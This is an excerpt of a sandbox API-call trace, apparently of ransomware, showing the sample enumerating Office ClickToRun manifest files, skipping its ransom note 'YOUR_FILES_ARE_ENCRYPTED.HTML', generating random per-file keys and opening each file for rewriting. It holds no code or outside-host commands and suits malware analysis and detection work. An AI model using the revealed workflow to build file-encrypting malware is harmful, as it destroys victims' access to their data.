param_1="7E") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="C6") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="FB") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="41") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="97") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="41") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="89") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="F0") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="E2") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="50") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="F0") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="FD") returned 2 [0105.449] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="25") returned 2 [0105.450] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml" [0105.450] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.450] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.450] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f706a3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82f706a3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65595fb2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.office64muiset.msi.16.en-us.xml", cAlternateFileName="C2755E~1.XML")) returned 1 [0105.450] StrStrIW (lpFirst="C2RManifest.office64muiset.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.450] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml") returned 122 [0105.452] PathFindExtensionW (pszPath="C2RManifest.office64muiset.msi.16.en-us.xml") returned=".xml" [0105.452] lstrlenW (lpString=".xml") returned 4 [0105.452] PathFindExtensionW (pszPath="C2RManifest.office64muiset.msi.16.en-us.xml") returned=".xml" [0105.452] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office64muiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.459] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2042) returned 1 [0105.459] GetProcessHeap () returned 0x600000 [0105.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.462] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="64") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="76") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B1") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="F5") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C9") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="EC") returned 2 [0105.462] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="68") returned 2 [0105.462] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="FA") returned 2 [0105.462] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="29") returned 2 [0105.462] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="EC") returned 2 [0105.462] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="30") returned 2 [0105.462] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="41") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="28") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5C") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="F1") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="95") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="75") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A6") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="82") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="49") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="FA") returned 2 [0105.463] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="95") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="81") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="07") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="8A") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F2") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="DF") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="B6") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="82") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="6A") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C8") returned 2 [0105.465] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="64") returned 2 [0105.466] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml" [0105.466] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.466] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.466] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82e76fbe, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82e76fbe, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x650f791d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x414c2, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.office64ww.msi.16.x-none.xml", cAlternateFileName="C2A036~1.XML")) returned 1 [0105.466] StrStrIW (lpFirst="C2RManifest.office64ww.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.467] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml") returned 119 [0105.467] PathFindExtensionW (pszPath="C2RManifest.office64ww.msi.16.x-none.xml") returned=".xml" [0105.467] lstrlenW (lpString=".xml") returned 4 [0105.467] PathFindExtensionW (pszPath="C2RManifest.office64ww.msi.16.x-none.xml") returned=".xml" [0105.475] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.475] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office64ww.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.476] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=267458) returned 1 [0105.476] GetProcessHeap () returned 0x600000 [0105.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.479] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="0D") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="91") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2E") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="9F") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3B") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="4B") returned 2 [0105.479] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="90") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="53") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="33") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="FA") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="9C") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="7A") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="2B") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="25") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="95") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="BD") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="40") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="15") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D2") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="53") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="1E") returned 2 [0105.479] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="60") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="02") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="30") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="5B") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="AE") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="24") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A1") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="72") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="76") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="28") returned 2 [0105.480] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0E") returned 2 [0105.481] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml" [0105.481] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.481] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.481] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d85586, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d85586, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6598f087, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x1a182, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.officemui.msi.16.en-us.xml", cAlternateFileName="C29059~1.XML")) returned 1 [0105.481] StrStrIW (lpFirst="C2RManifest.officemui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.481] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned 117 [0105.481] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0105.482] lstrlenW (lpString=".xml") returned 4 [0105.483] PathFindExtensionW (pszPath="C2RManifest.officemui.msi.16.en-us.xml") returned=".xml" [0105.483] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.500] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=106882) returned 1 [0105.500] GetProcessHeap () returned 0x600000 [0105.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.538] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A7") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="45") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="D9") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="89") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="DD") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="6E") returned 2 [0105.538] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="2F") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="C2") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5A") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="95") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CA") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="19") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="F9") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="1A") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B5") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="31") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="78") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="30") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D8") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="37") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="92") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="36") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="1A") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="B0") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="A8") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="27") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B4") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="6A") returned 2 [0105.538] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="46") returned 2 [0105.539] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="02") returned 2 [0105.539] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="0B") returned 2 [0105.539] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="39") returned 2 [0105.539] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml" [0105.539] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.540] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.540] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d73041, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d73041, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x657cb5e1, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.officemuiset.msi.16.en-us.xml", cAlternateFileName="C2467F~1.XML")) returned 1 [0105.540] StrStrIW (lpFirst="C2RManifest.officemuiset.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.542] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned 120 [0105.542] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0105.542] lstrlenW (lpString=".xml") returned 4 [0105.542] PathFindExtensionW (pszPath="C2RManifest.officemuiset.msi.16.en-us.xml") returned=".xml" [0105.542] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.551] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.officemuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.552] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2042) returned 1 [0105.552] GetProcessHeap () returned 0x600000 [0105.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.556] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="8D") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="9A") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="54") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="3B") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="57") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F9") returned 2 [0105.556] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B9") returned 2 [0105.556] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="1D") returned 2 [0105.556] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="99") returned 2 [0105.556] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="26") returned 2 [0105.556] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="24") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="95") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D3") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="68") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E2") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="3F") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="53") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="7B") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="CF") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="6F") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="72") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="A1") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="49") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="40") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="0D") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="16") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="3C") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C6") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3D") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="E6") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="7B") returned 2 [0105.557] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4B") returned 2 [0105.558] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml" [0105.558] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.558] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.558] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d6ced4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d6ced4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64629b0d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x176c8, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", cAlternateFileName="C21839~1.XML")) returned 1 [0105.558] StrStrIW (lpFirst="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.558] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned 131 [0105.558] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0105.558] lstrlenW (lpString=".xml") returned 4 [0105.559] PathFindExtensionW (pszPath="C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml") returned=".xml" [0105.559] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.559] CreateFileW 